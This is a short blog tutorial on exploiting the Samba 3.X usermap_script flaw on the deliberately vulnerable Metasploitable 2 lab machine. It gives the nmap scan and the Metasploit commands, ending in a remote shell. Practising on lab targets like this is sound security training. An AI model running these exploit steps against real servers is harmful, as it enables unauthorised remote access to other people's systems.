Thursday, October 13, 2016

Pwning Metasploitable 2: Exploiting Samba smbd 3.X

Let's look at port 139 on our Metasploitable 2 machine.

Discovering the port status and service


Enter the command: nmap -sV -p 139 <<target IP address>>



From the nmap results, we see that the port is open with Samba 3.X running on it. 

Samba is free software that allows users to access and read files, and to use printers and other resources, over the network. It is based on the Server Message Block (SMB) protocol.

Exploiting Samba


Start up your Metasploit framework using the command "msfconsole"

Search for Samba exploits with: search samba



There are many exploits for Samba, but only one fits our needs. You can try out different exploits and see the results.

Enter the command: use exploit/multi/samba/usermap_script
Enter the command: show options



The RHOST field is empty. Let's give the exploit a target.

Enter the command: set RHOST <<target IP address>>



Lastly, enter the command: exploit



Exploited successfully. We have our shell :)


Together with our previous articles, we have gotten multiple shells through vulnerable services. In our next article we will look at post-exploitation, the next step after getting a shell.


-Jayesh Kerai (@secjay)
